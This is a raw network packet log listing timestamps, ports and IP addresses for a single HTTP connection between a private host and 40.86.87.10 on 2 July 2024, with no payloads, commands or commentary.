Jul 2, 2024 07:31:03.775826931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775836945 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775850058 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.775850058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775861025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775871038 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.775873899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775883913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775893927 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.775893927 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.775916100 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.775943041 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:04.076822996 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:04.076858997 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:04.081820011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:04.081831932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:04.081847906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:04.081856012 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:04.081864119 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:04.482224941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:04.483684063 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:04.572771072 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:04.572819948 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:04.577713013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:04.577896118 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:04.577905893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:05.368815899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:05.368887901 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:05.369287968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:05.369347095 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:05.463787079 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:05.468626022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:05.855406046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:05.855468988 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:06.208904028 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:06.214112043 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:06.603471994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:06.604387999 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:06.805681944 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:06.810580015 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.200892925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.200907946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.200918913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.200999022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.201004982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.201010942 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.201015949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.201150894 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.201318979 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.201329947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.201340914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.201351881 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.201370001 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.201410055 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.324410915 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.324495077 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.324527025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.324539900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.324573040 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.324587107 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.324686050 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.324706078 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.324728966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.324743032 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.324836969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.324850082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.324861050 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.324881077 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.324903011 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.325129032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.325139999 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.325151920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.325162888 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.325174093 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.325175047 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.325186968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.325197935 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.325200081 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.325210094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.325228930 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.325265884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.325439930 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.325480938 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.325628996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.325642109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.325653076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.325664043 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.325684071 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.325714111 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.325925112 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.325937033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.325948954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.325964928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.325969934 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.325994015 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.326030016 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.411787033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.411859989 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.446800947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.446813107 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.446824074 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.446954012 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.446960926 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.446960926 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.446964979 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.446997881 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.447024107 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.447129011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.447140932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.447150946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.447161913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.447171926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.447173119 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.447204113 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.447216988 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.447549105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.447560072 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.447570086 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.447580099 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.447591066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.447596073 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.447602987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.447616100 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.447652102 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.447849989 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.447860003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.447870970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.447881937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.447899103 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.447930098 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.448009968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.448020935 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.448035002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.448048115 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.448059082 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.448079109 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.448344946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.448357105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.448391914 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.448477983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.448497057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.448520899 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.448545933 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.448623896 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.448636055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.448646069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.448656082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.448662043 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.448668003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.448677063 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.448698044 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.448724031 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.448925018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.448935986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.448945999 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.448977947 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.449003935 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.449075937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.449088097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.449103117 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.449115038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.449131966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.449131966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.449161053 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.449230909 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.449243069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.449254036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.449268103 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.449286938 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.449299097 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.449807882 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.449820042 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.449835062 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.449851036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.449857950 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.449862003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.449872971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.449884892 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.449884892 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.449923038 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.455091000 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.455101967 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.455112934 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.455146074 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.455158949 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.455240965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.455279112 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.503449917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.503606081 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.565824986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.565839052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.565850973 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.565886974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.565898895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.565910101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.565988064 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.565988064 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.565989017 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.566087961 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.566102982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.566122055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.566144943 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.566175938 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.566361904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.566375017 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.566386938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.566399097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.566404104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.566406012 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.566414118 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.566416979 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.566431046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.566436052 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.566458941 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.566489935 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.566754103 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.566768885 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.566782951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.566795111 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.566798925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.566812038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.566813946 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.566838026 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.566854954 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.567069054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567081928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567096949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567111015 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567111015 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.567125082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567133904 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.567137957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567151070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567156076 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.567164898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567183018 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.567198992 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.567225933 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.567647934 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567658901 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567676067 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567684889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567692041 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.567698002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567708969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567712069 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.567720890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567732096 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567743063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567744970 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.567754030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567761898 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.567764997 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567776918 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567784071 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.567789078 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567801952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.567804098 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.567819118 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.567848921 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.568521023 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.568532944 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.568545103 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.568556070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.568567038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.568567991 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.568578005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.568584919 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.568589926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.568607092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.568617105 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.568619013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.568629980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.568634987 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.568640947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.568653107 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.568660975 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.568662882 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.568675041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.568687916 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.568706989 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.569407940 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.569425106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.569437027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.569447994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.569458008 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.569458961 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.569467068 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.569470882 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.569483042 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.569494009 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.569505930 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.569514990 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.569514990 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.569516897 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.569529057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.569538116 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.569540977 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.569551945 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.569559097 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.569562912 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.569591999 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.569647074 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.570322037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.570333958 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.570343971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.570355892 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.570367098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.570373058 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.570378065 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.570389032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.570400000 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.570405960 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.570415974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.570431948 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.570432901 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.570440054 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.570475101 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.687887907 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.687903881 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.687963963 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.687995911 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688019037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688030005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688041925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688049078 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.688069105 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.688082933 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.688134909 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688147068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688157082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688169003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688194990 CEST	49730	80	192.168.2.4	40.86.87.10
